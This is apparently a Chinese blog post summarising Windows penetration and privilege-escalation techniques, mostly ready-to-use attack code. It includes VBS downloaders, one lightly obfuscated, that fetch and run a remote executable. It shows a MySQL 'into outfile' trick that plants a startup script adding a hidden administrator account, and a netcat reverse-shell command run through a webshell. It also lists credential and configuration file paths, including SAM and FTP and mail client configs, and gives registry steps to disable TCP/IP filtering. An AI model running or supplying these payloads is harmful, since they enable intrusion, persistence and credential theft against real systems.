Bootstrap

WINDOWS渗透与提权总结(2)

vbs 下载者:

011:
02 
03echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
04 
05echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
06 
07echo sGet.Type = 1 >>c:\windows\cftmon.vbs
08 
09echo sGet.Open() >>c:\windows\cftmon.vbs
10 
11echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
12 
13echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
14 
15echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
16 
17echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
18 
19cftmon.vbs

2:

01On Error Resume Next:Dim iRemote,iLocal,s1,s2
02 
03iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
04 
05s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
06 
07Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
08 
09Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
10 
11sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
12 
13cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
14create table a (cmd text):
1insert into a values ("set wshshell=createobject (""wscript.shell"")");
2 
3insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
4 
5insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
6 
7select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";

Cmd 下目录的操作技巧:

列出d的所有目录:

1for /d %i in (d:\freehost\*) do @echo %i

把当前路径下文件夹的名字只有1-3个字母的显示出来:

1for /d %i in (???) do @echo %i

以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:

1for /r %i in (*.exe) do @echo %i

以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出:

1for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i

这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中:

1for /f %i in (c:\1.txt) do echo %i

delims=后的空格是分隔符,tokens是取第几个位置:

1for /f "tokens=2 delims= " %i in (a.txt) do echo %i

Windows 系统下的一些常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘):

001c:\windows\php.ini
002 
003c:\boot.ini
004 
005c:\1.txt
006 
007c:\a.txt
008 
009c:\CMailServer\config.ini
010 
011c:\CMailServer\CMailServer.exe
012 
013c:\CMailServer\WebMail\index.asp
014 
015c:\program files\CMailServer\CMailServer.exe
016 
017c:\program files\CMailServer\WebMail\index.asp
018 
019C:\WinWebMail\SysInfo.ini
020 
021C:\WinWebMail\Web\default.asp
022 
023C:\WINDOWS\FreeHost32.dll
024 
025C:\WINDOWS\7i24iislog4.exe
026 
027C:\WINDOWS\7i24tool.exe
028 
029c:\hzhost\databases\url.asp
030 
031c:\hzhost\hzclient.exe
032 
033C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
034 
035C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
036 
037C:\WINDOWS\web.config
038 
039c:\web\index.html
040 
041c:\www\index.html
042 
043c:\WWWROOT\index.html
044 
045c:\website\index.html
046 
047c:\web\index.asp
048 
049c:\www\index.asp
050 
051c:\wwwsite\index.asp
052 
053c:\WWWROOT\index.asp
054 
055c:\web\index.php
056 
057c:\www\index.php
058 
059c:\WWWROOT\index.php
060 
061c:\WWWsite\index.php
062 
063c:\web\default.html
064 
065c:\www\default.html
066 
067c:\WWWROOT\default.html
068 
069c:\website\default.html
070 
071c:\web\default.asp
072 
073c:\www\default.asp
074 
075c:\wwwsite\default.asp
076 
077c:\WWWROOT\default.asp
078 
079c:\web\default.php
080 
081c:\www\default.php
082 
083c:\WWWROOT\default.php
084 
085c:\WWWsite\default.php
086 
087C:\Inetpub\wwwroot\pagerror.gif
088 
089c:\windows\notepad.exe
090 
091c:\winnt\notepad.exe
092 
093C:\Program Files\Microsoft Office\OFFICE10\winword.exe
094 
095C:\Program Files\Microsoft Office\OFFICE11\winword.exe
096 
097C:\Program Files\Microsoft Office\OFFICE12\winword.exe
098 
099C:\Program Files\Internet Explorer\IEXPLORE.EXE
100 
101C:\Program Files\winrar\rar.exe
102 
103C:\Program Files\360\360Safe\360safe.exe
104 
105C:\Program Files\360Safe\360safe.exe
106 
107C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
108 
109c:\ravbin\store.ini
110 
111c:\rising.ini
112 
113C:\Program Files\Rising\Rav\RsTask.xml
114 
115C:\Documents and Settings\All Users\Start Menu\desktop.ini
116 
117C:\Documents and Settings\Administrator\My Documents\Default.rdp
118 
119C:\Documents and Settings\Administrator\Cookies\index.dat
120 
121C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
122 
123C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
124 
125C:\Documents and Settings\Administrator\My Documents\1.txt
126 
127C:\Documents and Settings\Administrator\桌面\1.txt
128 
129C:\Documents and Settings\Administrator\My Documents\a.txt
130 
131C:\Documents and Settings\Administrator\桌面\a.txt
132 
133C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
134 
135E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
136 
137C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
138 
139C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
140 
141C:\Program Files\Symantec\SYMEVENT.INF
142 
143C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
144 
145C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
146 
147C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
148 
149C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
150 
151C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
152 
153C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
154 
155C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
156 
157C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
158 
159C:\MySQL\MySQL Server 5.0\my.ini
160 
161C:\Program Files\MySQL\MySQL Server 5.0\my.ini
162 
163C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
164 
165C:\Program Files\MySQL\MySQL Server 5.0\COPYING
166 
167C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
168 
169C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
170 
171c:\MySQL\MySQL Server 4.1\bin\mysql.exe
172 
173c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
174 
175C:\Program Files\Oracle\oraconfig\Lpk.dll
176 
177C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
178 
179C:\WINDOWS\system32\inetsrv\w3wp.exe
180 
181C:\WINDOWS\system32\inetsrv\inetinfo.exe
182 
183C:\WINDOWS\system32\inetsrv\MetaBase.xml
184 
185C:\WINDOWS\system32\inetsrv\iisa, dmpwd\achg.asp
186 
187C:\WINDOWS\system32\config\default.LOG
188 
189C:\WINDOWS\system32\config\sam
190 
191C:\WINDOWS\system32\config\system
192 
193c:\CMailServer\config.ini
194 
195c:\program files\CMailServer\config.ini
196 
197c:\tomcat6\tomcat6\bin\version.sh
198 
199c:\tomcat6\bin\version.sh
200 
201c:\tomcat\bin\version.sh
202 
203c:\program files\tomcat6\bin\version.sh
204 
205C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
206 
207c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
208 
209c:\Apache2\Apache2\bin\Apache.exe
210 
211c:\Apache2\bin\Apache.exe
212 
213c:\Apache2\php\license.txt
214 
215C:\Program Files\Apache Group\Apache2\bin\Apache.exe
216 
217c:\Program Files\QQ2007\qq.exe
218 
219c:\Program Files\Tencent\, qq\User.db
220 
221c:\Program Files\Tencent\qq\qq.exe
222 
223c:\Program Files\Tencent\qq\bin\qq.exe
224 
225c:\Program Files\Tencent\qq2009\qq.exe
226 
227c:\Program Files\Tencent\qq2008\qq.exe
228 
229c:\Program Files\Tencent\qq2010\bin\qq.exe
230 
231c:\Program Files\Tencent\qq\Users\All Users\Registry.db
232 
233C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
234 
235c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
236 
237c:\Program Files\Tencent\RTXServer\AppConfig.xml
238 
239C:\Program Files\Foxmal\Foxmail.exe
240 
241C:\Program Files\Foxmal\accounts.cfg
242 
243C:\Program Files\tencent\Foxmal\Foxmail.exe
244 
245C:\Program Files\tencent\Foxmal\accounts.cfg
246 
247C:\Program Files\LeapFTP 3.0\LeapFTP.exe
248 
249C:\Program Files\LeapFTP\LeapFTP.exe
250 
251c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
252 
253c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
254 
255C:\Program Files\FlashFXP\FlashFXP.ini
256 
257C:\Program Files\FlashFXP\flashfxp.exe
258 
259c:\Program Files\Oracle\bin\regsvr32.exe
260 
261c:\Program Files\腾讯游戏\QQGAME\readme.txt
262 
263c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
264 
265c:\Program Files\tencent\QQGAME\readme.txt
266 
267C:\Program Files\StormII\Storm.exe

各种网站的配置文件相对路径大全:

001/config.php
002 
003../../config.php
004 
005../config.php
006 
007../../../config.php
008 
009/config.inc.php
010 
011./config.inc.php
012 
013../../config.inc.php
014 
015../config.inc.php
016 
017../../../config.inc.php
018 
019/conn.php
020 
021./conn.php
022 
023../../conn.php
024 
025../conn.php
026 
027../../../conn.php
028 
029/conn.asp
030 
031./conn.asp
032 
033../../conn.asp
034 
035../conn.asp
036 
037../../../conn.asp
038 
039/config.inc.php
040 
041./config.inc.php
042 
043../../config.inc.php
044 
045../config.inc.php
046 
047../../../config.inc.php
048 
049/config/config.php
050 
051../../config/config.php
052 
053../config/config.php
054 
055../../../config/config.php
056 
057/config/config.inc.php
058 
059./config/config.inc.php
060 
061../../config/config.inc.php
062 
063../config/config.inc.php
064 
065../../../config/config.inc.php
066 
067/config/conn.php
068 
069./config/conn.php
070 
071../../config/conn.php
072 
073../config/conn.php
074 
075../../../config/conn.php
076 
077/config/conn.asp
078 
079./config/conn.asp
080 
081../../config/conn.asp
082 
083../config/conn.asp
084 
085../../../config/conn.asp
086 
087/config/config.inc.php
088 
089./config/config.inc.php
090 
091../../config/config.inc.php
092 
093../config/config.inc.php
094 
095../../../config/config.inc.php
096 
097/data/config.php
098 
099../../data/config.php
100 
101../data/config.php
102 
103../../../data/config.php
104 
105/data/config.inc.php
106 
107./data/config.inc.php
108 
109../../data/config.inc.php
110 
111../data/config.inc.php
112 
113../../../data/config.inc.php
114 
115/data/conn.php
116 
117./data/conn.php
118 
119../../data/conn.php
120 
121../data/conn.php
122 
123../../../data/conn.php
124 
125/data/conn.asp
126 
127./data/conn.asp
128 
129../../data/conn.asp
130 
131../data/conn.asp
132 
133../../../data/conn.asp
134 
135/data/config.inc.php
136 
137./data/config.inc.php
138 
139../../data/config.inc.php
140 
141../data/config.inc.php
142 
143../../../data/config.inc.php
144 
145/include/config.php
146 
147../../include/config.php
148 
149../include/config.php
150 
151../../../include/config.php
152 
153/include/config.inc.php
154 
155./include/config.inc.php
156 
157../../include/config.inc.php
158 
159../include/config.inc.php
160 
161../../../include/config.inc.php
162 
163/include/conn.php
164 
165./include/conn.php
166 
167../../include/conn.php
168 
169../include/conn.php
170 
171../../../include/conn.php
172 
173/include/conn.asp
174 
175./include/conn.asp
176 
177../../include/conn.asp
178 
179../include/conn.asp
180 
181../../../include/conn.asp
182 
183/include/config.inc.php
184 
185./include/config.inc.php
186 
187../../include/config.inc.php
188 
189../include/config.inc.php
190 
191../../../include/config.inc.php
192 
193/inc/config.php
194 
195../../inc/config.php
196 
197../inc/config.php
198 
199../../../inc/config.php
200 
201/inc/config.inc.php
202 
203./inc/config.inc.php
204 
205../../inc/config.inc.php
206 
207../inc/config.inc.php
208 
209../../../inc/config.inc.php
210 
211/inc/conn.php
212 
213./inc/conn.php
214 
215../../inc/conn.php
216 
217../inc/conn.php
218 
219../../../inc/conn.php
220 
221/inc/conn.asp
222 
223./inc/conn.asp
224 
225../../inc/conn.asp
226 
227../inc/conn.asp
228 
229../../../inc/conn.asp
230 
231/inc/config.inc.php
232 
233./inc/config.inc.php
234 
235../../inc/config.inc.php
236 
237../inc/config.inc.php
238 
239../../../inc/config.inc.php
240 
241/index.php
242 
243./index.php
244 
245../../index.php
246 
247../index.php
248 
249../../../index.php
250 
251/index.asp
252 
253./index.asp
254 
255../../index.asp
256 
257../index.asp
258 
259../../../index.asp

去除TCP IP筛选:

TCP/IP筛选在注册表里有三处,分别是:

1HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
2 
3HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 
5HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分别用以下命令来导出注册表项:

1regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 
3regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 
5regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

然后再把三个文件里的:

1“EnableSecurityFilters"=dword:00000001”

改为:

1“EnableSecurityFilters"=dword:00000000”

再将以上三个文件分别用以下命令导入注册表即可:

1regedit -s D:\a.reg
2 
3regedit -s D:\b.reg
4 
5regedit -s D:\c.reg

Webshell 提权小技巧:

Cmd路径:

1c:\windows\temp\cmd.exe

Nc 也在同目录下,例如反弹cmdshell:

1"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

通常都不会成功。

而直接在 cmd 路径上输入:

1c:\windows\temp\nc.exe

命令输入:

1-vv ip 999 -e c:\windows\temp\cmd.exe

却能成功。。这个不是重点

我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。

命令行调用 RAR 打包:

1rar a -k -r -s -m3 c:\1.rar c:\folde
 

悦读

道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。

最新收录
UCOSIII 时间片轮调度接口OS_SchedRoundRobin详解
Neutron - ML2 插件 create_network 函数剖析
大数据系统基本实验(持续更新中)
数据库的约束条件(Oracle)
2023第14届蓝桥杯C/C++A组省赛题解
Android Webview加载外部html时选择加载本地的js,css等资源文件
在SSM项目中如何使用shiro【详细教程】
C++:类和对象(上)
【网站项目】SpringBoot574药品管理系统
工程专题-Gradle学习之旅
;